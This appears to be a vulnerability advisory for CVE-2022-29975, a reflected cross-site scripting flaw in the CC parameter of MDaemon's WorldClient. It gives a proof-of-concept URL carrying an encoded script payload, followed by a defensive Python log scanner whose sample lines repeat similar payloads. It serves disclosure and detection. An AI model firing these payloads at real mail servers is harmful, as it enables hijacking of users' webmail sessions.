CVE-2022-29975: MDaemon-/MDaemon XSS at CC endpoint at main · haxpunk1337/MDaemon-
An authenticated reflected cross-site scripting (XSS) vulnerability in the CC parameter was discovered in MDaemon before 22.0.0.
haxpunk1337 Create MDaemon XSS at CC endpoint
Latest commit 1591439 Apr 25, 2022
Product: MDaemon
Status: Fixed in version 22.0.0
PoC:
https://localhost/WorldClient.dll?Session=<SESSION_COOKIE>&View=Compose&ReturnConfig=1&t=&spellcheck&cc=%22%3E%3Cscript%3Ealert(%27XSS_TEST_BY_GTN%27)%3C/script%3E&bcc=
XSS executed
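For defenders on versions before 22.0.0, a detection-side check for the request shape shown in the PoC, as an added example that is not part of the original advisory. It assumes access logs in Common Log Format (for instance from a reverse proxy in front of WorldClient), treats `to` and `bcc` like `cc` as an assumption, and uses hypothetical function names.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

RECIPIENT_PARAMS = ("cc", "to", "bcc")  # the page names cc; to/bcc are an assumption
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
MARKUP_RE = re.compile(
    r"<\s*/?\s*[a-z][a-z0-9]*[\s/>]"  # HTML tag; "<alice@example.com>" does not match
    r"|[\"']\s*>"                     # quote then '>' (attribute breakout)
    r"|\bon[a-z]+\s*=",               # inline event handler
    re.IGNORECASE,
)

def fully_decode(value, rounds=3):
    """Undo repeated percent-encoding so that %253C is seen as '<'."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_params(url):
    """Return recipient parameters that carry markup on a Compose request."""
    parts = urlsplit(url)
    query = {k.lower(): v for k, v in parse_qs(parts.query, keep_blank_values=True).items()}
    is_compose = "compose" in [v.lower() for v in query.get("view", [])]
    if not parts.path.lower().endswith("/worldclient.dll") or not is_compose:
        return []
    return [name for name in RECIPIENT_PARAMS
            if any(MARKUP_RE.search(fully_decode(v)) for v in query.get(name, []))]

def scan(log_lines):
    """Yield (line_number, parameter_names) for each flagged access-log line."""
    for number, line in enumerate(log_lines, 1):
        match = REQUEST_RE.search(line)
        hits = suspicious_params(match.group(1)) if match else []
        if hits:
            yield number, hits

# Constructed sample log lines (not taken from a real server).
SAMPLE_LOG = [
    '192.0.2.10 - - [25/Apr/2022:10:00:01 +0000] "GET /WorldClient.dll?Session=ABC&View=Compose&cc=%22Alice%22%20%3Calice%40example.com%3E&bcc= HTTP/1.1" 200 5120',
    '192.0.2.11 - - [25/Apr/2022:10:00:05 +0000] "GET /WorldClient.dll?Session=ABC&View=Compose&ReturnConfig=1&cc=%22%3E%3Cscript%3Ealert(1)%3C/script%3E&bcc= HTTP/1.1" 200 5188',
    '192.0.2.12 - - [25/Apr/2022:10:00:09 +0000] "GET /WorldClient.dll?Session=ABC&View=Compose&cc=%2522%253E%253Cscript%253E HTTP/1.1" 200 5131',
    '192.0.2.13 - - [25/Apr/2022:10:00:12 +0000] "GET /WorldClient.dll?Session=ABC&View=List&cc=%3Cb%3E HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for number, hits in scan(SAMPLE_LOG):
        print(f"line {number}: markup in {', '.join(hits)}")
```

The first sample line is a legitimate display-name address and is not flagged; the third shows why values are decoded repeatedly before matching.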